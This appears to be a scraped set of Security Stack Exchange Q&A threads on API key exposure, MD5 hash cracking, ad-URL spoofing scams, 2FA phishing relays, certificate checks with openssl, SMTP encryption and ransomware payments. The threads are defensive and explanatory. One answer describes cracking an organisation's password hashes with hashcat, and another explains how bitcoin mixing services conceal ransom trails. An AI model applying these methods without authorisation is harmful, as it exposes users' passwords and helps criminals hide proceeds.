CRM a Contacts object with the user's information. Do a GET on a list of Dealers that sell their products to display. I started with #2, the GET API call, where I found out that I can query the Users table. I have not created the API, I have only been making requests of it. The GET call requires a param query= where the value is a SELECT statement in the system's query language, which is then translated to SQL (presumably preventing SQLI attacks, but I don't know how it interprets/translates to SQL, so I'm not touching that with a 10ft pole). By changing SELECT * FROM Dealers; to SELECT * FROM Users; in the query I was able to see every user's data. The way the CRM handles users is with a portal on their site. A user is created in the portal, where there is an "Is Admin" checkbox. This can be edited at any time through the portal. This is the process to making API requests: A user makes a request to the CRM, containing the username, for a token. The token is concatenated with the "secret" access key for that user, the resulting string is MD5 hashed and then sent back to request a session token. This session token is included with every request, as a querystring param, to "verify" that the request is "authorized". One of the problems is that if an 'admin' user makes a request of the Users table, the response is a list of every user with the information I listed above as well as the user's "secret" access token (and other information). So it's even worse than just exposing a password, it's practically granting access to anyone by impersonating anyone. | The password format in the userpassword attribute looks like the standard format used by various unix services, such as the default system password service which stores hashed passwords in /etc/shadow . The format is basically: $ type $ salt $ hash In your example, the type is 1, which designates an md5 hash. There are other well-known types, such as various sizes of the sha-family hash functions. Breaking an md5 hash is almost trivial today, even when it's salted, because md5 is so fast. It's not a hash function which is safe to use for hashing passwords; hashcat and other password crackers can literally hash millions or even billions of password candidates per second. So this data store service isn't just horrible because it sends user password hashes back, it's even more horrible because it actually uses md5 hashes to store passwords. To prove to your boss that this really isn't secure, you could download hashcat and a few password lists (you can easily find them online), and then run hashcat on a computer with a very powerful GPU on all the passwords you get from the service. Make a note of how many passwords hashcat can crack (without looking at the passwords themselves - they may reveal private information about the people who chose them, and you don't want to actually know their passwords), and inform the people whose passwords were compromised that they need to choose a new password. You'll probably need to get permission to do all this first, because depending on where you live and work, this might actually be considered a malicious attack, or even be illegal. Aside : If you were stuck on using this service even after voicing your misgivings, I'd suggest that setting up an automated password cracker that runs without human intervention and informs people (by sending them an e-mail) when it manages to crack their password would be a way to protect your users from this kind of bad design. It would help to weed out weak passwords and increase the amount of time needed by a real attacker to crack passwords. Edit : Zach pointed out that the aside isn't common practice and shouldn't be attempted by someone not able to assess the risks. I fully agree with that. At the very least, if you did something like that, you should have management okay it. Still, NOT doing this doesn't make the resulting system more secure. It's the equivalent of sticking your head in the sand out of fear that if you actually did something to improve password security, it might backfire on you. We know that people choose bad passwords, and we know that md5 is not a good way to hash passwords. If we can't change these two facts, and we are in a position to weed out weak passwords, then we should probably do it to make our users safer. One important reason this isn't seen much, or even considered much, is that we usually aren't in a position to implement it. Good systems don't use fast hash functions to hash passwords, and we usually don't get access to the whole hashed password database. | {
"source": [
"https://security.stackexchange.com/questions/161059",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/124560/"
]
} |
161,071 | Related: Is the Web browser status bar always trustable? How can Google search change the location in a URL tooltip? I've always thought you can "hover" over a link to see where it really goes, until today. A coworker (working from home) searched for "Target" in Google Search (using edge). He clicked the top result, which happened to be an ad, and was redirected to a phishing page posing as Microsoft trying to get him to call a "tech support" number. I got the same results on a different computer, on a different network. When I hover over the link, both links show "www.target.com" at the bottom, but clicking the ad link takes you to a malware page and the second link (first search result after the ad) takes you to the real Target.com page. If displaying the wrong URL in the tooltip requires Javascript, how did tech-supportcenter get their Javascript onto the Google search results page? UPDATE
Here's the same results in a virtual machine with a fresh install of Windows, on a different network: Here's the source for the URL. It looks like it does include the "onmousedown" Javascript as the first question I linked to mentioned. Does Google allow advertisers to display any URL they want for the tooltip? | If displaying the wrong URL in the tooltip requires Javascript, how did tech-supportcenter get their Javascript onto the Google search results page? The scammers did not manage to inject JS into the search results. That would be a cross-site scripting attack with much different security implications than misleading advertisement. Rather, the displayed target URL of a Google ad is not reliable and may conceal the actual destination as well as a chain of cross-domain redirects. The scammers possibly compromised a third-party advertiser and hijacked their redirects to lead you to the scam site. Masking link targets is a deliberate feature of Google AdWords. It is generally possible to specify a custom display URL for an ad link which can be different from the effective final URL . The idea is to enable redirects through trackers and proxy domains while keeping short and descriptive links. Hovering over an ad will only reveal the display URL in the status bar, not the real destination. Here is an example: I'm searching for "shoes". The first ad link displays www.zappos.com/Shoes : When I click on it, I actually get redirected multiple times: https:// www.googleadservices.com /pagead/aclk?sa=L&ai=DChXXXXXXXd-6bXXXXXXXXXXXXkZw&ohost=www.google.com&cid=CAASXXXXXp8Yf-eNaDOrQ&sig=AOD64_3yXXXXXXXXXXXXXYX_t_11UYIw&q=&ved=0aXXXXXXHd-6bUXXXXXXXXXwIJA&adurl=
-- 302 -->
http:// pixel.everesttech.net /3374/c?ev_sid=3&ev_ln=shoes&ev_lx=kwd-12666661&ev_crx=79908336500&ev_mt=e&ev_n=g&ev_ltx=&ev_pl=&ev_pos=1t1&ev_dvc=c&ev_dvm=&ev_phy=1026481&ev_loc=&ev_cx=333037340&ev_ax=23140824620&url=http://www.zappos.com/shoes?utm_source=google%26utm_medium=sem_g%26utm_campaign=333037340%26utm_term=kwd-12666661%26utm_content=79908336500%26zap_placement=1t1&gclid=CI3vqXXXXXXXXXXXXXBBA
-- 302 -->
http:// www.zappos.com /shoes?gclid=CI3vXXXXXXXXXXXXXMBBA&utm_source=google&utm_medium=sem_g&utm_campaign=333037340&utm_term=kwd-12666661&utm_content=79908336500&zap_placement=1t1 Obviously, Google has strict destination requirements for ad links in place and an ordinary customer won't get their ad approved if they set the link target to a completely different domain. But scammers do occasionally find ways around the vetting process.
At least, Google's policy about "destination mismatches" is pretty clear: The following is not allowed: Ads that don't accurately reflect where the user is being directed
[...] Redirects from the final URL that take the user to a different domain [...] Trusted third-party advertisers may be permitted to issue cross-domain redirects, though. Some of the exceptions are listed here , e.g.: An example of an allowed redirect is a company, such as an AdWords
Authorized Reseller, using proxy pages. [...] For example: Original website: example.com Proxy website: example.proxydomain.com We allow the company to use "example.proxydomain.com" as the final
URL, but retain "example.com" as the display URL. One major weak spot is that Google doesn't control the third-party redirectors (in above example, that's pixel.everesttech.net ). After Google has vetted and approved their ads, they could simply start redirecting to a different domain without immediately getting noticed by Google. It's possible that, in your case, attackers managed to compromise one of these third-party services and pointed their redirects to the scam site. In recent months, there have been several press reports about an almost identical scam pattern, e.g. this report about a fraudulent Amazon ad whose display URL spells out amazon.com but redirects to a similar tech support scam. (By now, your discovery has also been picked up by a few news sites, including BleepingComputer .) | {
"source": [
"https://security.stackexchange.com/questions/161071",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59311/"
]
} |
161,403 | Detailed in the latest NSA dump is a method allegedly used by Russian intelligence to circumvent 2FA. (In this instance Google 2FA with the second factor being a code.) It’s a fairly obvious scheme and one that I’m sure must be used regularly.
It appears to work like this: URL is sent to target via spear phishing, the URL points to attacker
controlled phishing website that resembles Google Gmail. User send credentials to the phony Gmail. (Assumption) Attacker enters credentials into legitimate Gmail, and checks if a second factor is required. Target receives legitimate second factor. Phony Gmail site prompts target for second factor. Target sends second factor. Attacker enters second factor into legitimate site and successfully authenticates. The only way I can see to defend against this attack is by spotting the phony site as being a scam or blocking the phishing site via FW’s, threat intel etc. Is there any other practical way to defend against such a scheme? | Not all two-factor authentication schemes are the same. Some forms of 2FA, such as sending you a text message, are not secure against this attack. Other forms of 2FA, such as FIDO U2F, are secure against this attack -- they have been deliberately designed with this kind of attack in mind. FIDO U2F provides two defenses against the man-in-the-middle attack: Registration - The user registers their U2F device with a particular website ("origin"), such as google.com . Then the U2F device will only respond to authentication requests from a registered origin; if the user is tricked into visiting goog1e.com (a phishing site), then the U2F won't respond to the request, since it can see that it is coming from a site that it hasn't been previously registered with. Channel ID and origin binding - U2F uses the TLS Channel ID extension to prevent man-in-the-middle attacks and enable the U2F device to verify that it is talking to the same web site that the user is visiting in their web browser. Also, the U2F device knows what origin it thinks it is talking to, and its signed authentication response includes a signature over the origin it thinks it is talking to. This is checked by the server. So, if the user is on goog1e.com and that page requests a U2F authentication, the response from the U2F device indicates that its response is only good for communication with goog1e.com -- if the the attacker tries to relay this response to google.com , Google can notice that something has gone wrong, as the wrong domain name is present in the signed data. Both of these features involve integration between the U2F two-factor authentication device and the user's browser. This integration allows the device to know what domain name (origin) the browser is visiting, and that allows the device to detect or prevent phishing and man-in-the-middle attacks. Further reading on this mechanism: An excerpt from the FIDO U2F spec, regarding defenses against MITM attacks. Yubico's explanation of the protocol flows. | {
"source": [
"https://security.stackexchange.com/questions/161403",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83641/"
]
} |
161,838 | I apologise for to terseness of this question; I have an issue. Google.co.uk is failing its HSTS on my browsers. Is this an issue with google.co.uk or is this just me? Is someone middle-manning my internet connection? While I can find plenty of sites that tell me google.co.uk is working I haven't been able to establish if the HSTS issue is me or Google. I suspect it's me but would like some 3rd party confirmation. P.S.: This appears so far just for google.co.uk, and unfortunately snuck.me doesn't seem to be working to clarify other sites' non-HSTS certificates either. Update: After ten minutes of being down, google.co.uk now works again, however by using snuck.me I find the following: Fingerprint according to the browser: D1:8F:DE:83:4A:68:88:32:DD:CF:C8:6B:0C:74:94:33:02:75:BC:43 finger print according to snuck.me: 42:38:CE:6C:AA:C5:FE:13:A0:5A:56:88:F3:F2:E7:E4:D7:14:07:DA Does this confirm I have a MITM? | Your browser rejected a certificate, but this doesn't have to be caused by an attack. Google.co.uk is failing its HSTS on my browsers. The warning you see doesn't indicate a problem with HSTS in particular. It's just Firefox saying: "The certificate appears invalid. And by the way, we won't let you add a manual exception because the site uses HSTS." 1 There are many plausible reasons why you got served an invalid certificate for a short amount of time. It could be a hickup at your ISP, a problem with your router, SSL interception by a captive portal (as mentioned by @FedericoPoloni) or, theoretically, a poor attempt at an MITM attack. The first step of investigation would be to check which certificate you were actually served. Afterwards, you didn't correctly compare the certificates: You connected to www.google.co.uk but ran the third-party test against google.co.uk . These are technically different domains that serve different certificates depending on the indicated server name. Here I'm testing each -servername with openssl and you should recognize both fingerprints: $ openssl s_client -servername www.google.co.uk -connect www.google.co.uk:443 < /dev/null 2>/dev/null | openssl x509 -fingerprint -noout -in /dev/stdin
SHA1 Fingerprint=D1:8F:DE:83:4A:68:88:32:DD:CF:C8:6B:0C:74:94:33:02:75:BC:43
$ openssl s_client -servername google.co.uk -connect www.google.co.uk:443 < /dev/null 2>/dev/null | openssl x509 -fingerprint -noout -in /dev/stdin
SHA1 Fingerprint=42:38:CE:6C:AA:C5:FE:13:A0:5A:56:88:F3:F2:E7:E4:D7:14:07:DA 1 HSTS (HTTP Strict Transport Security) is a header which web servers can send to indicate that clients should never connect to the site over plain HTTP (for a specified amount of time). Your browser picked up that header during one of your previous visits to www.google.co.uk or preloaded it. One of the header's side effects is that the UI wont't allow you to ignore certificate warnings anymore by adding an exception. | {
"source": [
"https://security.stackexchange.com/questions/161838",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/82333/"
]
} |
161,924 | I stumbled something interesting today when I was adding an account to my gmail one. Why is SSL boldly stated as recommended when TLS supersedes SSL? The links for SSL and TLS is the same: https://support.google.com/mail/answer/22370?hl=en | From that link: Select a secured connection Check with your other mail service for their recommended port number and authentication type. Here are some common combinations: SSL with port 465 TLS with port 25 or 587 The difference, then, is that "SSL" means SMTP over SSL-or-TLS on port 465, and "TLS" means SMTP with STARTTLS on port 25 or 587. So what's the difference between them? STARTTLS is opportunistic encryption. The connection starts as plaintext SMTP, and the client tries to initiate encryption if the server says that it can. The problem with this is that the plaintext negotiation can be relayed and modified by a Man-in-the-Middle attacker, exactly the way that sslstrip works for HTTP redirects and links to HTTPS. SMTP-over-SSL, on the other hand, starts with a SSL (or TLS--the exact protocol is negotiated) connection, then SMTP is conducted over that tunnel. With this configuration, the client always expects to use SSL, and can't be tricked into going plaintext. So the SSL-or-TLS naming is not the real issue. Google is using "SSL" to mean the older "smtps" standard, which is actually more secure in this case. In reality, the service is probably using TLS, and Google's mail servers will negotiate the most secure connection possible, depending on the other service. EDIT: As @Mehrdad points out in the comments, Google will change which option is "recommended" based on the port number that is selected in the dropdown. This shows that their recommendation is not based on higher assurance of encryption, but on what is most likely to work: port 465 is registered with IANA as 'smtps', and is expected to be SMTP-over-SSL. Ports 25 and 587 are 'smtp' and 'submission' respectively, and are expected to be plaintext. Since I doubt that Google will refuse to send mail over these ports if STARTTLS cannot be negotiated, "TLS" remains the weaker, opportunistic option. It is, however, more likely to be supported than port 465. EDIT 2: @grawity did the legwork and determined that Google does not, in fact, fall back to plaintext SMTP if STARTTLS is not supported. You have to explicitly select the "Unsecured" option when configuring the server. This is really good work by Google to ensure transport security for emails. Of course, all that has been said already about STARTTLS remains true: it requires this extra step of making TLS a strong requirement to avoid downgrade attacks. | {
"source": [
"https://security.stackexchange.com/questions/161924",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/122806/"
]
} |
162,021 | Suppose that someone stole my password, he/she can easily change it by confirming the old password. So, I am curious that why do we need that step and what is the purpose of using old password confirmation? | If you are logged in and I sit down at your computer, I can lock you out of your account and transfer ownership to myself. | {
"source": [
"https://security.stackexchange.com/questions/162021",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26034/"
]
} |
162,090 | If all the computers use the same operating system, attackers only need to focus on one operating system, would it be unsafe? | In 2003, Dan Geer from @Stake published a seminal paper on this very topic - Cyber In security: The Cost of Monopoly . Surprisingly (given that he was employed by Microsoft at the time) he comes squarely down into the camp claiming that diversity is vital to security (emphasis mine): Regardless of the topic – computing versus electric power generation
versus air defense – survivability is all about preparing for failure
so as to survive it. Survivability, whether as a concept or as a
measure, is built on two pillars: replicated provisioning and
diversified risk.... ...redundancy has little ability to protect against cascade
failure; having more computers with the same vulnerabilities cannot
help if an attack can reach them all. Protection from cascade failure
is instead the province of risk diversification – that is, using more
than one kind of computer or device, more than one brand of operating
system, which in turns assures that attacks will be limited in their
effectiveness. This fundamental principle assures that, like farmers
who grow more than one crop, those of us who depend on computers will
not see them all fail when the next blight hits. This sort of
diversification is widely accepted in almost every sector of society
from finance to agriculture to telecommunications. (He went on to conclude that Microsoft was a threat insofar as it introduced a monoculture; which turned out to be a Career Limiting Move for him at Microsoft.) In the comments, @Johnny suggests that this is a credentialist answer. While I've chosen to quote a respected professional's well-written paper here, I do so because it mirrors my 20+ years of experience in the computer and security industry. (Which, heck, almost seems like secondary credentialism. But I'm just saying that I'm referencing rather than parroting). For example, the 3-tier (web/app/db) architecture became a widely accepted improvement in security terms a long time ago, because the separation between differing functions helped enforce security. In that vein, my experience has been that there is a tradeoff between the additional work setting up heterogenous systems (say, IIS with a MySQL-on-Linux backend) and the additional benefit of diversity when attacks (or patches!) introduce disruption into the stack. And that I've regretted having a larger problem more times than I regretted the extra work :) Virgin field epidemics - either because you're not segmenting your networks, or because you're using the same passwords, or you've only got one [DNS/Hosting/Network] provider, or because you're using the same OS everywhere - all end badly. | {
"source": [
"https://security.stackexchange.com/questions/162090",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/151126/"
]
} |
162,420 | I run a small business out of my home and I'm not really doing anything labor intensive, no games and I'm not cutting any code or anything of that nature. A lot of what I do is phone based sales, so I'm basically just accessing my web based work gmail account, sending PDF contracts out to be e-signed and storing those on cloud based drive and a lot of browsing for info, finding leads etc. I could probably get away with a thin client but I just bought a cheap laptop, and I am curious to know if I'm on the right track here by thinking that Virtualbox for everyday business is my best option for security and usability for just one desktop running Windows 10 (and if so maybe I should go with a lighter weight OS). | By using the same VM for browsing, word documents, and email, you are exposing all of your data to the same level of risk. Instead of doing all of this activity in the VM, consider doing your browsing and email in the VM, but the contract work and bookkeeping stuff on the host OS. That way if you get phished, the attack is limited to the VM, and can't do really nasty stuff like encrypt your docs and hold them for ransom. | {
"source": [
"https://security.stackexchange.com/questions/162420",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/151357/"
]
} |
162,583 | A bitcoin transaction has details of the incoming address as well as the outgoing address (where the bitcoins are being transferred), so my question is why that outgoing address has not done anything in tracking down ransomware attackers, like the WannaCry authors? | There is a chance that once the bitcoins have been converted into ‘real money’ or ‘real assets’ the ledger could leak information on the owners of those bit coins. But even then tracking and attribution can be very complex, but in answer to your question the reason in this case is probably that the attacker(s) haven’t ‘cashed’ them in yet. Depending on who carried out the attack they may never do anything with the bitcoin they have as their attack may not have been financially motivated. There are ways to launder bitcoins using services such as Bitlaundry, Bitmix or Bitcoinlaundry. These laundry services work as follows: (credit to the description below) Imagine that Alice wishes to send bitcoins to Bob. Bob, sadly, is not well liked. Alice would rather not have anyone know that she sent Bob bitcoins. So, Alice puts Bob's address in the form at BitLaundry. Alice gets a one-time-use address from BitLaundry. Alice sends the money to that address. BitLaundry sends money out to recipients every 30 minutes. (But, it doesn't send out Alice's money immediately, that might be suspicious..) So, a random number of 30 minute segments later, BitLaundry sends the money out to Bob. BitLaundry then deletes the database link between the one-time-use address and Bob. Alice has sent money to BitLaundry, but people do this all the time. She's one of many. BitLaundry has sent money to Bob, but BitLaundry has sent money out to a whole bunch of other people as well. Alice and Bob are much less linked than they would have been otherwise. | {
"source": [
"https://security.stackexchange.com/questions/162583",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/151692/"
]
} |
162,690 | I bought brand new HTC Desire 526G with operating system 4.4.2 (Kitkat), everything is as it should be (not rooted) so it is still on factory settings. But now I didn't get for a long time any security updates, I have checked manually in system updates and it says: There are no updates available for your phone. If I check my Android version it says: 4.4.2 & Android security patch level: 2016-01-01 , but in a same time if I go on CVE details, I founded a lot of vulnerabilities for this system. Also I have installed X-Ray from Duo Security to check if my system is vulnerable to any exploits and it gave me positive result, that my device is vulnerable to different ones. What can I do in my situation, I mean how can I update my Android device in order to protect it from publicly known vulnerabilities? | You are essentially asking what to do if you are using software which is known to be vulnerable but where no updates are available. This is a problem not restricted to Android phones but you'll find it everywhere, for example in IoT devices like routers or cameras but also with software on the PC which only get support for a limited time. The answer should be obvious: either replace the software (or device) with one with no known vulnerabilities (and still getting updates) or reduce the risk of infection by decreasing the attack surface. In the case of an Android phone the best option would probably be to get alternative and still supported software like LineageOS for it. If no alternative software supports your device you might need to get a new phone with still supported software and this time hopefully from a vendor known for better support. If none of this is possible or if the costs don't match the assumed risk you could decrease the attack surface to reduce the risk of an exploit against your device. This can be done by having no network connection (neither mobile, WiFi nor Bluetooth) and removing all apps you don't really need. In case you have root on the phone you could also install some firewall on it to restrict network traffic to only a few selected apps. Note that there is no perfect security even with supported software. How much effort and cost you invest for protection depends a lot on what you need to protect. If there are no sensitive data on the device you might accept a limited risk by using it in mobile network and maybe in a restricted WiFi network (so that it cannot be used to exploit other systems in your home network). If instead you have sensitive data on the device you should probably invest some more and get a still supported device from a vendor with fast updates. | {
"source": [
"https://security.stackexchange.com/questions/162690",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134969/"
]
} |
162,874 | I'm planning on encrypting a large media library of mine. Have looked into different solutions, but thought I should ask the community what your thoughts are. I don't want to encrypt each file individually, I'd like to create a container which I decrypt once when mounting. I have 1.4 TB of data consisting mainly of 2-4 GB files, though some files exceed 4 GB (meaning zipping isn't an option). Ideally I'd like the solution to be cross platform (even if that means command line only). My current best solution is to use GPG. I would create a tarball of my 1.4 TB directory then encrypt that file with my GPG key. Though I don't have much expertise in compression, I would think this isn't ideal to tar 1.4 TB. Which also means browsing the files will be cumbersome, unless I untar which would double the storage needed along with many other downsides. Do you have any suggestions for other ways I should go about this?
I don't need to solution to be incredibly secure, prioritising on convenience for this use case. More Info: I currently use OSX's built in encryption method of creating a .dmg and mounting it to access the contents. Hoping for a cross platform version of this. | Why not use a commonly used application to do it? VeraCrypt is a good choice as it replaced the respected TrueCrypt application and allows you to create an encryption container that you mount as a drive. | {
"source": [
"https://security.stackexchange.com/questions/162874",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/151981/"
]
} |
162,957 | I'm not sure this is the right place, but figured people would find it useful if they aren't too familiar with security policies and general best practices. There is a lot of information out there, however, we all know that you can't completely lock down a system because people need access to various outside sources. So as a Cyber Security forum (of sorts), what would your recommendations be to combat this latest Petya and NotPetya ransomware attack? Edit: it would also be useful to know what allowed the affected companies' systems to be infected. | I think one of the main lessons learned is that the security services shouldn’t be hoarding zero days and tools to exploit them, (especially) if they can’t properly secure them. The thing to remember, however, is that WannaCrypt and Petya both had patches available before they hit and both also took advantage of poor configuration. Additionally, many organisations that were hit hard could have avoided some (possibly all) pain if they had standard belts and braces security practices in place. The main lesson organisations should learn is that they should get the basics right. For example: Vulnerability Management Conduct regular vulnerability scanning, understand the security posture of all assets and what vulnerabilities are present, what threats are related to these vulnerabilities, and what risk they pose to the IT estate and the business it serves. This includes both missing patches (i.e. MS17-010) and poor configuration (i.e., having SMBv1 enabled). This should all be supported by proper processes that allow for ongoing discovery, remediation of vulnerabilities (either via action or risk acceptance) and confirming remediation. Ideally, all risks across the entire IT estate should be known about and managed. Additionally, roles and responsibilities should be assigned to ensure that all of the above is done correctly. This includes security managers, security analysts, vulnerability managers IT technicians etc. Patch Management Ensure that patches are deployed in a timely manner. This doesn’t just mean pushing the latest Patch Tuesday patches. This also includes understanding what software you have in your IT estate and having a full inventory of assets to make sure everything is patched. Removable Media Controls Ensure removable media is limited to devices that are sanctioned only. Ideally, I would blacklist all removable media and whitelist anything that you approve. (This is just my view, however) Malware Prevention Ensure you have some kind of AV on all end points, at least the classic heuristics and definition based AV. (although there are more advanced solutions available) Make sure it is up to date and working. Disaster Recovery Ensure you have backups, including off-site, off-line backups of critical data. Incident Management Ensure you have a plan to react to a major security incident; ensure you have the right people in the right places supported by the right processes. Control User Privilege This one goes without saying really: make sure that all users have the least amount of privilege. This should be supported to ensure that this is audited regularly. User Education and Engagement Ensure all staff understand the security policy of your organisation. Conduct exercises such as phishing campaigns to test your users and provide training to allow them to understand the risks involved and be better prepared to spot pushing emails, web sites, social engendering etc. (Again, this is just a view, some people may suggest that security shouldn’t be a user problem; it should be an IT problem) Good Network Security Hygiene Have the correct access controls on your perimeter, ensure you have properly configured firewalls at all appropriate places in your network (with regular rule audits and reviews), and make sure that VLANS are properly setup with as much segmentation as is required. Ensure that all remote users can connect securely and that any devices they connect from have at least 1-to-1 patch levels as devices already on the network. Also, make sure that you have robust BYOD controls. | {
"source": [
"https://security.stackexchange.com/questions/162957",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59883/"
]
} |
162,970 | I have a JavaScript web application that communicates with an API on a different subdomain. The HTML and Javascript are all hosted in S3. A conventional CSRF token is put into the body of the HTML page and either used by a form or read by JavaScript; but as the HTML is statically hosted this isn't possible in my case. Is it safe to request a CSRF token from the server during application startup with an AJAX request? The resulting token could then be attached as a header to all of the future requests to the API. Is there a better solution to protecting against CSRF attacks in my architecture? | I think one of the main lessons learned is that the security services shouldn’t be hoarding zero days and tools to exploit them, (especially) if they can’t properly secure them. The thing to remember, however, is that WannaCrypt and Petya both had patches available before they hit and both also took advantage of poor configuration. Additionally, many organisations that were hit hard could have avoided some (possibly all) pain if they had standard belts and braces security practices in place. The main lesson organisations should learn is that they should get the basics right. For example: Vulnerability Management Conduct regular vulnerability scanning, understand the security posture of all assets and what vulnerabilities are present, what threats are related to these vulnerabilities, and what risk they pose to the IT estate and the business it serves. This includes both missing patches (i.e. MS17-010) and poor configuration (i.e., having SMBv1 enabled). This should all be supported by proper processes that allow for ongoing discovery, remediation of vulnerabilities (either via action or risk acceptance) and confirming remediation. Ideally, all risks across the entire IT estate should be known about and managed. Additionally, roles and responsibilities should be assigned to ensure that all of the above is done correctly. This includes security managers, security analysts, vulnerability managers IT technicians etc. Patch Management Ensure that patches are deployed in a timely manner. This doesn’t just mean pushing the latest Patch Tuesday patches. This also includes understanding what software you have in your IT estate and having a full inventory of assets to make sure everything is patched. Removable Media Controls Ensure removable media is limited to devices that are sanctioned only. Ideally, I would blacklist all removable media and whitelist anything that you approve. (This is just my view, however) Malware Prevention Ensure you have some kind of AV on all end points, at least the classic heuristics and definition based AV. (although there are more advanced solutions available) Make sure it is up to date and working. Disaster Recovery Ensure you have backups, including off-site, off-line backups of critical data. Incident Management Ensure you have a plan to react to a major security incident; ensure you have the right people in the right places supported by the right processes. Control User Privilege This one goes without saying really: make sure that all users have the least amount of privilege. This should be supported to ensure that this is audited regularly. User Education and Engagement Ensure all staff understand the security policy of your organisation. Conduct exercises such as phishing campaigns to test your users and provide training to allow them to understand the risks involved and be better prepared to spot pushing emails, web sites, social engendering etc. (Again, this is just a view, some people may suggest that security shouldn’t be a user problem; it should be an IT problem) Good Network Security Hygiene Have the correct access controls on your perimeter, ensure you have properly configured firewalls at all appropriate places in your network (with regular rule audits and reviews), and make sure that VLANS are properly setup with as much segmentation as is required. Ensure that all remote users can connect securely and that any devices they connect from have at least 1-to-1 patch levels as devices already on the network. Also, make sure that you have robust BYOD controls. | {
"source": [
"https://security.stackexchange.com/questions/162970",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10023/"
]
} |
163,152 | I was wiping and restoring a family member's Android phone today, as it was running slowly with loads of apps on it. I decided to back up their WhatsApp messages to Google Drive in order to recreate their chat history easily after the wipe. On the phone, I noticed this message from WhatsApp: Important: Media and messages you back up are not protected by WhatsApp end-to-end encryption while in Google Drive. The same message is also available here, at the end of the section for Creating a Google Drive Backup : https://faq.whatsapp.com/en/android/28000019 Does this mean that if I have been chatting to anyone in the past, and that person has periodic Google Drive backups enabled, then my conversation is compromised to Google and/or WhatsApp? If this is the case then it actually makes end-to-end encryption on WhatsApp useless unless the person you're chatting to swears that they don't have Google Drive backup enabled on their end. We might as well just use server-side encryption. Or is the message given by WhatsApp badly expressed and ambiguous? | You're confusing message integrity and security with secrecy. WhatsApp provides end to end encryption, meaning the message you send can only be read by the recipient and vice versa. This protects you from third parties trying to eavesdrop on your conversation, and even prevents WhatsApp themselves from reading the messages. You can't demand WhatsApp to allow you to wiretap a conversation if WhatsApp themselves have no idea what's being sent. However once the message is in the hands of the recipient, it's a different story. In order for it to appear in their chat history, it has to be saved on the phone. If a persons device is compromised, so is your chat history with that person. The person could also screenshot your conversation, or even use another phone to take a picture of your conversation. Backup to Google Drive is simply a way of backing up your chat history so if you change devices or reset your phone all your messages aren't gone. Once the conversation is in Google Drive however, if a valid law enforcement request is made for your files, your conversation is now compromised, as Google only provides server side encryption, which allows them to decrypt your files. This even opens you up to further compromise if the recipients Google account was ever hacked, as the hackers would have access to your message history with that person. In short, no, the warning is accurate . It's not ambiguous, it tells you exactly what it means, if you save the messages to Google Drive, anyone with access to that account can retrieve the messages. This all boils down to the level of trust you have in your recipient. If you're not 100% sure that the person you're talking to isn't going to rat you out, best not to voice your dissent of your government to them. | {
"source": [
"https://security.stackexchange.com/questions/163152",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/134406/"
]
} |
163,327 | I just went to reset my Western Digital password and they emailed me my plaintext password, instead of providing online form to let me change it. This is really concerning to me as the site accepts/processes payments for their drives, and I have previously made payments on this site. As a countermeasure to this, I am treating that password used on this site as if it was already leaked, and am ensuring new and unique password for every other site I used it on. Just to be sure. What is the best way to address this in a way that would have the highest chance of successfully encouraging them to correct their password policy? | If they process payments via credit card, they must maintain PCI-DSS compliance. You could always report a violation . They could potentially send an auditor and insist on remediations. The whole process would take probably a year or more. It would not surprise me if they are already working on it, assuming you have found a bona fide issue. | {
"source": [
"https://security.stackexchange.com/questions/163327",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/79540/"
]
} |
164,836 | Earlier today, Lone Learner asked Why is there no certificate error while visiting google.net although it presents a certificate issued to google.com? The accepted answer explains that the issue was caused by an SNI Hole . You've fallen into a "SNI hole". Google will present a different certificate if there is no "Server Name Indication" given in the client's TLS handshake part. - StackzOfZtuff The top search result for "What is an SNI Hole" is the question page for What are the security implications of enabling a SNI-hole on a web server? , which isn't much help for those unfamiliar with the term. What exactly is an SNI Hole? | SNI ( Server Name Indication ) is a TLS (Transport Layer Security) extension in which the client presents the server the domain name for the target it wants to access within the TLS handshake. It is used in cases where there are multiple virtual servers with different certificates on the same IP address, so that the server can present the correct certificate. Insofar it is similar to the HTTP host header in the HTTP request, which is used to select the matching virtual host configuration - only the Host header cannot be used to select the certificate since it is sent inside the HTTP request. (i.e. after the TLS handshake is already done). Since the SNI TLS extension is optional, some clients may not send this extension. This is the case with openssl s_client without the -servername argument, but also with many TLS libraries in different programming languages. And while all modern browsers use SNI, older browsers like IE8 on XP do not use it. If such a client connects to a server which has multiple certificates, the server does not know which certificate the client actually needs, i.e. the client falls into the "SNI hole" by not using the SNI extension. In this case the server usually either sends an error back (or sometimes just closes the connection) or uses a default certificate explicitly or implicitly configured for this purpose. | {
"source": [
"https://security.stackexchange.com/questions/164836",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141087/"
]
} |
165,131 | If i am able to access a database and delete all the files which a web app would read, would that be considered a Denial of Service attack? It is not a duplicate of the question in the following link since the hypothesis is different, although the outcome may be equivalent: Is unauthorised deletion an integrity or availability issue? | Yes, in the sense that anything which "denies service" is a "denial of service". The CIA Triad defines information security as anything which affects Confidentiality, Integrity, or Availability of the system / data. As pointed out in comments, this is not always an "attack" since it's just as likely to be accidental. Whether this is the result of a malicious attack, an admin botching a patch install, or the building catching fire, DoS due to data loss is definitely a security risk for which organizations should have a plan in place. Assuming it is an intentional attack, if they have enough access to the backend server to delete db files, then there are far more subtle and nefarious things they could do (like stealing the db, selectively deleting data, planting a network sniffer, etc), so a DoS is pretty much the least dangerous thing in the category of "attacker has write-access to the server's filesystem", which is why "deleting the database" is to "DoS" as "canoe" is to "vehicle": not the first thing that comes to mind, but technically counts. | {
"source": [
"https://security.stackexchange.com/questions/165131",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104296/"
]
} |
